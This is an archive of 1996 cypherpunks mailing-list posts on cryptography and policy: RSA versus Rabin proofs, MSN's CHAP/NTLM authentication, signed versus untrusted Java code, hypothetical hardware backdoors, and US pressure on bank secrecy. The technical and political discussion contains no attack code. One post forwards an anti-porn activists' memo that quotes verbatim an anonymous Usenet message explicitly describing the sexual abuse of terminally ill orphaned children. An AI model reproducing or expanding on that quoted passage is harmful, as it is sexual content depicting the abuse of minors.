> MSN uses CHAP (PPP's challenge-response handshake) for network layer
> authetication, and NTLM (Windows NT's challenge-response handshake) for
> application-layer authentication. The password is never sent in across
> the network. Challenge-responses encrypted with the password are sent.

Thanks; that's what I thought.

Never believe anything you're told by tech support. It was pretty clear to
me that the poor undereducated sod had the words "compression" and
"encryption" confused. NTLM isn't perfect, but it's difficult enough to be
secure enough for MSN. You're not doing anything IMPORTANT on MSN, are
you? 

Due to Win95's open memory model, there's probably some system call that a
virus/trojan can use to ask politely for the username and password; in
fact, isn't it the same API that has already been demonstrated? But if you
let such a beast on your machine, all bets are off anyway.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Apr 1996 12:27:48 -0700 (PDT)
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Golden Key Campaign
In-Reply-To: <199604251810.LAA17469@netcom9.netcom.com>
Message-ID: <199604251927.PAA27960@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> I will add to Bill's list:
> 
> 7) RSA is the best known and vetted of the Public Key algorithms.

Nota at all, Mr. Frantz. There are no proofs of security associated
with RSA. Rabin has excellent proofs that breaking a message is
strictly equivalent to factoring.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hieronym@desk.nl (t byfield)
Date: Thu, 25 Apr 1996 06:39:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: The Iron Mountain Report
In-Reply-To: <v02140b00ada47b37a48c@[17.202.12.102]>
Message-ID: <v03006602ada52da5e85a@[193.0.0.2]>
MIME-Version: 1.0
Content-Type: text/plain


6:33 AM  +0200 4/25/96, Rich Graves:

> The author of the Iron Mountain Report was interviewed on PBS a few weeks
> ago. It was a really over-the-top parody published in 1967.

	Leonard Lewin wrote it, evidently with some inspiration and help from
Victor Navasky, how head ed of _The Nation_. Any credulous right-wing kooks
looking for a "deeper understanding" of the _Iron Mountain Report_ might
want to check out a session on it being held by the Learning Alliance:
Lewin, Navasky, and a couple of others'll be yakking about it (in New York,
I assume).

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Thu, 25 Apr 1996 12:53:34 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Mindshare and Java
In-Reply-To: <ada43daa150210045c4d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960425153148.12377C-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Timothy C. May wrote:

> So, I was faced with a heart-rending choice: get an Intel box, put Linux on
> it, and try to "get in the mainstream" by writing something in Perl, or
> TCL, etc. (Though I note that the early success with writing remailers in
> Perl has not been followed by any other stunning applications of a
> similarly revolutionary nature...and I don't know of anybody doing anything
> Cypherpunkly-interesting in TCL, for example.)

Actually, I'm just starting such a project in TCL...

The first phase is as a shell for Matt Blaze's Crypto File System, so it 
can be run, and changes made, without opening up a shell or dealing with 
command-line options.

The next phase will be to write (what I beleive to be) the first graphical
PGP shell for X.

While this isn't a seriously cypherpunks-relevant app, as most people 
running X are capable of dealing with the command line (I am, too, but I 
don't want to open up a shell every time I load up my encrypted 
partition), but I'm using it as a jumping-off point.

I don't think TCL is suited to heavy-duty crypto applications, except as 
an interface. Mostly because it is interpreted, though I'm not sure how 
"everything is a string" would affect bignums. (And I wouldn't want to 
write a TCL bignum library...)

It might be possible to write a remailer front-end in TCL, and that might 
be a near-future project, if the frontend project proves successful. 
(Which it has, in a sense, because the first phase (though it isn't where 
I'd want to distribute it far and wide) is done to the point where I can 
load my CFS partition and disconnect it without opening a shell...

(early Alpha code is available upon request, and suggestions/help/co-writing
 is most certainly welcome...)

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 25 Apr 1996 15:46:11 -0700 (PDT)
To: perry@piermont.com
Subject: Re: Golden Key Campaign
Message-ID: <199604252245.PAA14156@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:18 PM 4/25/96 -0400, Perry E. Metzger wrote:
>Bill Frantz writes:
>> I do not equate good vetting with proofs of security.  Given the Verona
>> intercepts, I don't think there are any valid proofs of the security of
>> complete crypto-systems.
>
>In that case, why do you think that an RSA system would be better
>implemented as a matter of necessity than a Rabin system?

I don't imply that.  I do think that the use of proof is of limited
applicability in demonstrating security.  Complex proofs can be as much in
doubt as complex computer programs.  Used within its limitations, proof is
very valuable, but too often its value is asserted beyond those
limitations.  The Varona case applies because of the common statement that
one time pads are the only provably secure crypto-system.


>> 7a) RSA is the best known public key algorithm.
>
>Meaningless and unimportant.

Not in terms of why people use RSA rather than some other algorithm.


>> 7b) RSA is the best vetted public key algorithm.
>
>Again, false. RSA has no proofs of security, and other systems have
>far better proofs. RSA also leaks small bits of information like
>parity that other systems do not leak. This is not to say that RSA is
>bad, but its choice over, say, Rabin, at least for encryption, is
>fairly abitrary.

Thanks for the information.  Schneier (V2) says that while Rabin and
Williams are provably as secure as factoring.  They, like RSA, are
completely insecure against a chosen cyphertext attack.  Correcting this
problem by using a one-way hashing function makes them no longer provably
as secure as factoring, although adding a random string does not have this
defect.

Rabin also has the problem, which Williams corrects, that each message has
four possible decypherments, and the user must select the correct one.

While these systems have a small theoretical advantage over RSA (their
provability), how much effort has been expended in examining them compared
with RSA?  Level of effort is important in determining "best vetted".  (I
realize that some efforts, such as research into factoring, apply to both
systems.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Apr 1996 16:12:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <m0uCa4r-00094aC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:53 PM 4/25/96 -0400, Jeffrey C. Flynn wrote:

>I received several responses to this question.  My favorite was as follows...
>
>>This is probably science fiction, particularly at the VHDL level.
>>Maybe someone could make a crime of opportunity out of a microcode
>>flaw, but there's a risk of it being found out during testing.
>>
>>To do it right would require collusion of the design and test teams.
>>They need to ensure the back door stays closed, isn't tickled by
>>"normal" testing and only opens when really requested. So a lot of
>>people are in on the secret even before it gets exploited for
>>nefarious purposes.
>>
>>And what nefarious purposes would pay for the risks and costs of this?
>>If the secret got out, the design team, product line, and company
>>would be dead in the marketplace and probably spend the rest of their
>>lives responding to lawsuits. What could you use this for that is
>>worth the risk?

This analysis seems to assume that the entire production run of a standard 
product is subverted.  More likely,I think, an organization like the NSA 
might build a pin-compatible version of an existing, commonly-used product 
like a keyboard encoder chip that is designed to transmit (by RFI signals) 
the contents of what is typed at the keyboard.  It's simple, it's hard to 
detect, and it gets what they want.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 25 Apr 1996 16:23:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:  US law - World Law - Secret Banking
Message-ID: <199604252321.QAA17568@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Black Unicorn <unicorn@schloss.li>
> What has consistently alarmed me is the United States trend of extending
> her own moral and ethical standards world wide.  Granted the United States
> is the foremost world economic power, but the power to control markets and
> the political power to invade the sovereignty of other states are two
> distinct issues.  The United States is, in one form or another, attempting
> to homogonize the legal systems of the world to comply with her own
> concept of what is "right" or "fair."  This is disturbing.

I was encouraged to read the description by former NSA lawyer Stewart
Baker of Japan's attitudes towards crypto policy (from the URL posted
here by wb8foz@nrk.com, http://www.us.net/~steptoe/276915.htm).  We can
all take heart in what Baker finds alarming:

   In the United States and Europe, encryption policy is formed by a mix
   of interests. Advocates of business, national security agencies, and
   more recently the police -- all play a large role in the policy
   debate. This policy triumvirate is difficult to see in Japan. For a
   variety of reasons, commercial interests are predominant in Japanese
   government thinking about encryption. Time after time during my
   interviews, I was reminded that Japan was an island nation that has
   not had to defend itself for fifty years and so has not had to
   confront the national security concerns associated with encryption.
   And Japanese police face severe political and constitutional
   constraints on wiretapping, so the prospect of losing this criminal
   investigative tool seems not to be as troubling to the Japanese
   government as to the United States and many European nations.
   
   [...]
   
   All in all, the emerging Japanese consensus on cryptography could pose
   a major challenge to U.S. (and perhaps European) government hopes of
   striking a compromise between commercial and governmental interests
   with respect to cryptographic policy. If Japan puts the weight of its
   government and industry behind strong, unescrowed encryption,
   competitive pressure will quickly doom any attempt to influence this
   technology through export controls and standard-making. Governments
   will be forced to choose between overt regulation in the Russian and
   French manner or laissez-faire policies of the sort that now prevail
   in the domestic markets of countries like the United States, Great
   Britain, and Germany.
   
I love the description of the choice facing the government, between
laissez-faire policies versus the kind of system prevailing in Russia.
This is a remarkably clear and frank description of the policy directions
which are available.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 25 Apr 1996 13:48:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Anti-porn activists' old memo on alt.sex.*, anonymous remailers
Message-ID: <4lTy_wq00YUvMge4Am@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is a note I came across in my archives hinting at how anti-porn
groups used the content of the alt.sex.* groups to pass the CDA, and how
they may not exactly be a fan of anonymous remailers.

Attached is a memo from Deen Kaplan, previously a vice president at the
then-named National Coalition Against Pornography, to other anti-porn
activists. Note that John McMickle soon afterwards became a member of
Sen. Chuck Grassley's staff and helped recruit witnesses for the July
1995 cyberporn hearings. (You may recall that Grassley was pushing for a
law even worse than the CDA.)

Some of the names on the To: line are easy to identify, like Rice-Hughes
and Jepsen from Enough is Enough! And Cathy Cleaver from the Family
Research Council, whom I'm debating in a few weeks. The others I haven't
figured out yet.

(The FRC is run by Gary Bauer, a former policy assistant to Reagan and a
former undersecretary at the Department of Education. Now Bauer heads
the FRC, the DC-based lobbying extension of James Dobson's Focus on the
Family." Dobson's history includes serving on the Attorney General's
Commission on Pornography, aka the Meese Commission. Bauer also embraced
Marty Rimm's cyberporn study as gospel, calling the ACLU and EFF "porn
industry apologists" who are "taking cheap shots at this comprehensive
study.")

I'm passing this along as an FYI.

-Declan

My Rimm web site:
  http://www.cs.cmu.edu/~declan/rimm/
The attached article and followup:
  http://www.cs.cmu.edu/~declan/rimm/asst/anti_porn_group_11_22_94.letter
Cleaver's op-ed on CDA: "Kids Need Protection in Cyberspace, Too"
  http://fight-censorship.dementia.org/dl?num=1153

----------------------------------------------------------------------

            Note for Donna Rice-Hughes

 From:      Deen Kaplan

 Date:      Tue, Nov 22, 1994 1:43 PM

 Subject:   Alt.sex.pedophilia

 To:        Cathy Cleaver; Dee Jepson; Dianna Denney; Dixie Sanner; Donna
            Rice-Hughes; Jan LaRue/Lillian; John McMickle; Lori Fender;
            Maryam Kubasek; Monique/Ginny/Stacy; Paul Maurer; Rick Schatz


 Here's an anonymous message posted last night on the Usenet Board
 Alt.sex.pedophilia. REALLY sick and a good example (even if the person is
 kidding, which is unlikely in this area.). I'll do a demo of how the
 USENET boards work in the office for D.C. people after Thanksgiving.
 ----------------------------
 Receiving information ...
    1. Help I'm here with you and must know more about this group
    2. Now what?
    3. Now what?
 --> 4. fun at the hospital
 Message-ID:<090418Z21111994@anon.penet.fi>

Path:msuinfo!uwm.edu!math.ohio-state.edu!howland.reston.ans.net!pipex!demon!kaa
rna.cc.jyu.fi!news.funet.fi!news.eunet.fi!anon.penet.fi
 Newsgroups: alt.sex.pedophile.mike-labbe
 From: an141380@anon.penet.fi
 X-Anonymously-To: alt.sex.pedophile.mike-labbe
 Organization: Anonymous contact service
 Reply-To: an141380@anon.penet.fi
 Date: Mon,21 Nov 1994 09:02:17 UTC
 Subject: fun at the hospital
 Lines: 10

 Those orphan kids in the terminally ill section of the hospital are so fun
 at night when they are drugged out. I love sucking on their tiny
 finger-sized cocks and probing their tight holes. Their slender little
 bodies are completely smooth. They're going to die pretty soon so they
 won't come back to me several years from now as hairy grown up men blaming
 me for why they are all mentally messed up. And since they are orphans
 with no one to look over them except for overworked staff, I could get
 away with just about anything.

 ------------------------------
 To find out more about the anon service, send mail to help@anon.penet.fi.
 Due to the double-blind, any mail replies to this message will be
 anonymized, and an anonymous id will be allocated automatically. You have
 been warned. Please report any problems, inappropriate use etc. to
 admin@anon.penet.fi







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 25 Apr 1996 16:35:29 -0700 (PDT)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Mindshare and Java
In-Reply-To: <199604252023.NAA00294@netcom9.netcom.com>
Message-ID: <Pine.SOL.3.91.960425162433.22627B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Bill Frantz wrote:

> At 10:47 PM 4/24/96 -0700, Rich Graves wrote:
> >code safely. I'm sorry, I'm just not interested in running untrusted code. 
> >Give me digitally signed code that I can trust, or for which the author 
> >can at least be held accountable, and I'll be happy. 
> 
> I, for one, am interested in running untrusted code.  If I can run
> untrusted code, I can greatly reduce my exposure to Trojan horses and bugs.
>  It bothers me that if I run Microsoft Word, it can trash my MacWrite

Both policies make sense in different circumstances; however,  
refusing to run unsigned code, even though it reeks of FUCKING STATISM is 
easier verify, and harder to circumvent; We're experimenting with both 
approaches in Solid Oak (one classloader that rejects unsigned classes, 
another that works with the security manager to use the signed IDs to 
make policy decisions where necessary. That approach is the more 
flexible, but it remains vulnerable to flaws in the policy manager if it 
is somehow possible to do naughty things without going through the 
security manager. If you require even untrusted code to be signed you at 
least have a target-id to send to blacknet for attitude adjustment.

One thing that could be retroactively added to the vm pretty easily would 
be the ability to add capability requirements to methods, and have the 
class loader automatically generate code to check for those requirements 
before executing the body of the method

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 25 Apr 1996 16:50:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Golden Key Campaign
Message-ID: <v02140b00ada5c85554fb@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> At  1:11 AM 4/25/96 -0700, Bill Stewart wrote:
[...why do people continue to promote the RSA method?...]
> >
> >Sure.  Because 1) it's a good algorithm for the job,

And there are other equally good algorithms which can also do the job.

> >2) we've learned it, and have a PGP base behind our inertia,

A pretty insignificant base actually (at least compared to the internet
as a whole) and supposedly PGP 3.0 will support multiple encryption
methods so maybe the RSA reliance can die the ignoble death it deserves.
One point left out from the original posting is that a Rabin exchange
can use a RSA public key provided that the p and q in the public key are
Blum integers (which also lets you use the public key for probabalistic
PKE, as well as a few other neat tricks), so changing PGP to support
Rabin would not be much of an inconvenience...

> >3) The legalities of RSA are well-defined,

Yes, and the most well-defined point is that until September in
the year 2000 you will pay an arm and both legs to use RSA.

> >4) the Stanford patents mostly run out in 1997, unless Roger's suit
> >        succeeds first,

A point in favor of non-RSA public-key methods.

> >5) the price of RSA is fairly low, once free RSAREF came out

You must be joking.  Have you ever tried to deal with RSA lawyers?

> >6) the price of licensing Cylink patents is high and/or unpredictable

True, but Cylink needs to milk their patents for all they are worth for the
remaining 481 days they have left. In a little more than one year they will
not be left with much more than a footnote in the crypto history books.

>
> I will add to Bill's list:
>
> 7) RSA is the best known and vetted of the Public Key algorithms.

Best known perhaps, but ElGamal and Rabin have also been studied in depth
(in fact, Rabin is provably as secure as factoring, RSA has not been
proven this secure, it is only assumed that it is.) Most public key methods
fall back to only a handful of real trap-doors, so there is only a limited
amount of vetting to be done (esp. when compared to symmetric encryption
methods.)

> Some people say that the millennium comes on Jan 1, 2000.  Others say it
> comes on January 1, 2001.  I say it comes on September 20, 2000 when the
> RSA patent expires.

Nope, it starts on August 19, 1997.  After that point it becomes possible
to deploy systems using secure public-key crypto worldwide without needing
to pay someone royalties... :)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 25 Apr 1996 13:55:02 -0700 (PDT)
To: Cypherpunks <cypherpunks@toad.com>
Subject: US law - World Law - Secret Banking
In-Reply-To: <199604251135.NAA07136@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.93.960425165304.2700D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


On Thu, 25 Apr 1996, Anonymous wrote:

>    Financial Times, April 23, 1996, p. 8.
>    Long arm of US law threatens business
>    By Clay Harris
> 
>    The extra-territorial reach of US law poses a growing
>    threat to non-US companies doing business, even indirectly,
>    with that country, an expert on money laundering said
>    yesterday.

It amazes me that this is new news.  I've been watching this since the mid
80s.

>    Mr Rowan Bosworth-Davies, senior consultant at London
>    solicitors Titmuss Sainer Dechert, told a conference in
>    Lisbon that US courts had been "consistent in concluding
>    that US law enforcement interests outweigh a foreign
>    nation's interests in preserving the confidentiality of its
>    banking or its business records".

The earliest of these decisions dates back to the 60s.  Good morning
reporters.  Have a nice nap?

[...]

>    The due diligence required was "truly awesome," Mr
>    Bosworth-Davies said. "Any new proposed business client who
>    is a US citizen, who proposes to do business on US
>    exchanges, buy US property, transfer money from a US
>    institution, pass money through a US institution or return
>    money to a US institution must become subject to a level of
>    investigation not hitherto contemplated."

What has consistently alarmed me is the United States trend of extending
her own moral and ethical standards world wide.  Granted the United States
is the foremost world economic power, but the power to control markets and
the political power to invade the sovereignty of other states are two
distinct issues.  The United States is, in one form or another, attempting
to homogonize the legal systems of the world to comply with her own
concept of what is "right" or "fair."  This is disturbing.

I will not go so far as to propose that this is some grand conspiracy or
some "one world government" plot.  I will comment, however, that what
started with concepts of anti-trust, and progressed into the field of
securities regulation, has (publically) become an issue of banking
secrecy and cryptography.

By no means are the states of the world united on the meaning of
anti-trust, the appropriate levels of regulation therein, or the manner in
which to enforce these segments of the law.  That the United States should
seek to impose her own will and concepts on foreign states strikes me as
the antithesis of this once noble power's call, indeed the central focus
of her foreign policy, for the self determination of all nation states.

One sees a larger trend.  The dream of European unification, many
times attempted attempted militarily (France, Napoleon, Germany), then
politico-economically (The European Union) has become a global legal
financial reform effort led by the United States.

While from the prespective of the United States, the position seems
rational, what is constantly ignored is the imposition on foreign states,
particularly those with a long culture of independent and unintrusive
legal regimes.  (Switzerland, Austria, Sweden have all felt the pressure
from the United States of late).

Perhaps unwittingly, under the guise of protecting her shores from 'Money
Laundering,' 'Narco-Terrorism,' Terrorism and any number of international
criminal problems, the United States appears to be a united front for
worldwide financial legal reform.

It is my prediction that this policy, which ignores the international
comity between nations, will severely disadvantage the country in the
years and decades to come.

Mr. May (I believe) on this list predicted the inevitable clash between
strong cryptography and the technologies and capacities it creates and
statist trends.  I join in his assesment.

Private banking in cyberspace is in its infancy.  At the moment
institutions are identified, have a geographical base, and depend on the
graces of a single host state to exist.  Many or most institutions hold
significant assets within the borders of the United States, and still
others derive a large portion of their income from U.S. branches.  These
days will not last forever.

The introduction of a geographically diverse, multi-jurisdiction, crypto
and secret sharing institution with completely blinded assets assured and
accountable merely through blind digital signatures is around the corner.
Such an institution will be impervious to the whims of the United States
or any other power.  She may even hold stock secretly in U.S.
institutions, offer mutual funds investing in U.S. stocks, and yet remain
beyond the reach of the legal systems and intelligence apperatus of the
western world.

It is my vision to create such a system.

>    A former legal adviser to the UK intelligence agencies MI5
>    and MI6, meanwhile, told the conference that organised
>    criminals should be declared "illegal international
>    organisations" (IIOs) and made subject to administrative
>    sanctions similar to those applying to "rogue states".

Any individual understanding the jargon of intelligence will appreciate
the meaning of this statement.  What is being called for here is the 
application of the full brunt of intelligence assets and even covert
actions to enforce that which cannot be enforced by law alone.

>    Mr David Bickford, deputy chairman of Strategy
>    International UK, said organised criminals planned their
>    crimes to take advantage of different national legal
>    systems and mutual legal assistance treaties.

As do tax attornies, multi-national corporations, wealthy individuals, and
import-export traders.  The United States has become expert in the process
of criminalizing the act of being a criminal.

>    A solution, he said, was to treat them as organisations,
>    not individuals. Once they were identified as IIOs, assets
>    would be subject to seizure and forfeiture.
>
>    The system would require strict oversight and a forum to
>    determine complaints and claims. Revenue provided by
>    forfeited assets could be applied to the cost of
>    investigation and to the parties which lost revenue as a
>    result.

A dangerous, frightening concept.  Akin to worldwide application of the
RICO act.

>    Financial Times, April 24, 1996, p. 8.
>    US prosecutor attacks bank secrecy laws
>    By Clay Harris

>    Mr Moscow, who since 1989 has been assigned to prosecute
>    cases related to Bank of Credit and Commerce International
>    said: "In the BCCI case, we had $3bn going from Egypt,
>    through New York, to Nassau in the Bahamas and back. I
>    don't suppose that there has been $3bn in trade between
>    Egypt and the Bahamas in all recorded history. A prudent
>    banker would have asked what business his customers were
>    in."

And that prudent banker might have been told by the CIA to shut up or take
a walk.

BCCIs problem was that the prosecutors in Miami and the Federal system
never bothered to do any work until the Iran Contra scandal.  This despite
constant allegations and indications of major frauds.

BCCI is a poor example because it involved corrupt bankers who formed the
bank with the intent of defrauding depositors and investors, not a bank
which was merely annoying to the tax authorities of the United States.

>    In a strong attack on bank secrecy laws, he said: "The
>    ancient concept that bank secrecy must be preserved to keep
>    a gentleman's financial affairs confidential -- dating back
>    to the days when only gentlemen had cheque accounts, and
>    their servants did not -- must give way to the current
>    reality.

Which reality?  That the United States wants access to the financial
records of anyone and everyone on the planet?

>    "Bank secrecy statutes in international finance are used by
>    crooks, tax evaders, securities fraudsters, and capital
>    flight fellows; they are used by narcotics dealers. But
>    they are not needed by honest folks engaged in honest
>    transactions."

Neither are walls, envelopes, whispers or any other manner of secret
keeping.  Correct?  Haven't we seen this before?

If prosecutors would do their job and concentrate on the crimes themselves
as opposed to reforming the entire international financial system to make
their work a bit easier, noone would be concerned.

Financial investigations are a crutch for poor prosecutors.

>    He added: "There is no reason why the people in Vanuatu
>    cannot have rigid bank secrecy laws. I do not care what
>    they do among themselves, so long as they are consenting
>    adults. I do care, however, if they try to merchant their
>    sovereign status and impose their sovereignty on New York
>    (along with rest of the civilised world), to protect the
>    narco dollars from detection... As we see it, if the money
>    goes through Manhattan, we may well have jurisdiction."

Jurisdiction over the Manhattan bank, fine.  What are you going to do?
Invade Vanatu?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMX/lzy1onm9OaF05AQHYfAgAj99lS+cdF8Nn4oTSu6IukBzTgdQf97em
GtAWp2N47RwA5GEtRl/b/zGBMPOHdsUh6OLklpy4MIeurPYlMAWH49nJlT2viV0e
MBU9q9/9q5w+7wGMHci76hRzb1gYYqBEvT9fGRhQx+fkL4Be8ZxuyYnhanapisZL
zFdqMhRJa1o6lKXA9MQjmJ42A2SR74HnjzuTkpjzc3Wq3V1jdByhs57xZj+gJWB1
fP1w4ii43zI54ZlWR6P88zYyYc5UYeYoaGVqe1hYGUEJ+2J+K/px2/AgH5p8LQAa
9zVTXMqLPwBxb8JDfV7ThcQilVTKTQKSfj2I8RRwHF4lI5cvIG4W/A==
=SZov
-----END PGP SIGNATURE-----

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 25 Apr 1996 13:58:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Brock Meeks: "The Encryption Clock"
Message-ID: <ElTyQ0W00YUvIjvUwF@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Near end, Mike Nelson is quoted insisting that White House wants
voluntary key escrow, etc. --Declan]



http://www.hotwired.com/muckraker/

The Encryption Clock
                
                When US Attorney General Janet Reno held a high-profile  
                news conference crowing about the first successful use of
                an "Internet wiretap," she set the "Encryption Clock" in
                motion.
   
                The Encryption Clock (my own invention) is shamelessly
                stolen from the "Doomsday Clock" ginned up by nuclear
                scientists during the Cold War. Since 1947 the Bulletin
                of Atomic Scientists has moved the minute hand on the   
                Doomsday Clock forward or backward; the placement was a 
                guess by the planet's top minds as to how close the world
                was to full-scale nuclear holocaust. Midnight signaled  
                the end of humanity. At the height of Reagan's "Evil   
                Empire" rhetoric, the clock was 3 minutes from striking 
                12. It was only after the USSR self-destructed that the
                clock was rolled back from the brink, and it now sits at
                14 minutes from 12.
   
                If the Encryption Clock strikes midnight, we will see the
                FBI's crypto wet dream realized: A ban on encryption 
                schemes that were not developed or endorsed by the    
                government.
               
                The ban will be swift and brutal and will come without
                public debate. It will cover the FBI's encryption "hat
                trick," outlawing private encryption during all phone  
                calls, modem communications, and even of files stored on 
                your hard disk.
   
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Apr 1996 17:00:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Mindshare and Java
In-Reply-To: <Pine.SOL.3.91.960425162433.22627B-100000@chivalry>
Message-ID: <Pine.GUL.3.93.960425164813.27532L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Simon Spero wrote:

> On Thu, 25 Apr 1996, Bill Frantz wrote:
> 
> > At 10:47 PM 4/24/96 -0700, Rich Graves wrote:
> > >code safely. I'm sorry, I'm just not interested in running untrusted
> > >code. Give me digitally signed code that I can trust, or for which
> > >the author can at least be held accountable, and I'll be happy. 
> > 
> > I, for one, am interested in running untrusted code.  If I can run
> > untrusted code, I can greatly reduce my exposure to Trojan horses and bugs.
> >  It bothers me that if I run Microsoft Word, it can trash my MacWrite
> 
> Both policies make sense in different circumstances; however,  
> refusing to run unsigned code, even though it reeks of FUCKING STATISM is 

It doesn't have to, reek I mean. By "held accountable" I mean by me, the
user, not the coercive power of the FUCKING STATE.

For me, the digital signatures would not be the imprimatur of "good, safe
code." The digital signature would mean, "Rich Graves <rich@c2.org>
accepts blame for this code." Or "This code is an official (or whatever
the unofficial official unofficial word would be) part of the GNU
project." Or "The Black Unicorn nym says 'Two Thumbs Up.'" Or "This is an
accurate copy of the code discussed on comp.windows.emulators.wine." 

In my fantasy world, signatures would be verified by the web of trust, not
the FUCKING STATE or FUCKING MICROSOFT. 

I guess "trusted" isn't the right word, thanks. I don't "trust" anything
that comes from Microsoft to be bug-free. I do expect it to be free from
exogenous viruses and trojans, though, so that the bugs would be
reproducible, and have a chance of being fixed.

In my fantasy world, I'm not asking you to verify signatures every time
you run something. Maybe you can tune how often you want stuff checked, so
you have a tradeoff between security and performance.

Sort of like COPS or Tripwire, but transparent to the user.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Apr 1996 17:09:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:  US law - World Law - Secret Banking
In-Reply-To: <199604252321.QAA17568@jobe.shell.portal.com>
Message-ID: <Pine.GUL.3.93.960425170147.27532M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Hal wrote:

> I was encouraged to read the description by former NSA lawyer Stewart
> Baker of Japan's attitudes towards crypto policy (from the URL posted
> here by wb8foz@nrk.com, http://www.us.net/~steptoe/276915.htm).  We can
> all take heart in what Baker finds alarming:

Yeah, that's sweet. I'm concerned that it might paint too glowing a
picture of Japanese civil liberties, though.

NOTE: -LOlsen (I'm speaking beyond my experience)

It was my impression that the Japanese response to the Aum Shinrikyo
terrorist gassing was more draconian and one-sided than the US response to
the Oklahoma City bombing. For all the doomsday talk, you must acknowledge
that the "anti-terrorism" bill was stalled for a full year by an odd
coalition of right-wing and civil-liberties groups. I have not heard about
such political discussions in Japan. The police seemed to have carte
blanche to ban the cult, seize its assets, and investigate and/or arrest
anyone associated with it. 

If I'm misinformed, please enlighten me.

It's certainly true that internationalization usually means openness,
which usually means privacy and freedom.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Apr 1996 14:19:33 -0700 (PDT)
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Golden Key Campaign
In-Reply-To: <199604252054.NAA03146@netcom9.netcom.com>
Message-ID: <199604252118.RAA28185@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> At  3:27 PM 4/25/96 -0400, Perry E. Metzger wrote:
> >Bill Frantz writes:
> >> I will add to Bill's list:
> >> 
> >> 7) RSA is the best known and vetted of the Public Key algorithms.
> >
> >Not at all, Mr. Frantz. There are no proofs of security associated
> >with RSA. Rabin has excellent proofs that breaking a message is
> >strictly equivalent to factoring.
> 
> I do not equate good vetting with proofs of security.  Given the Verona
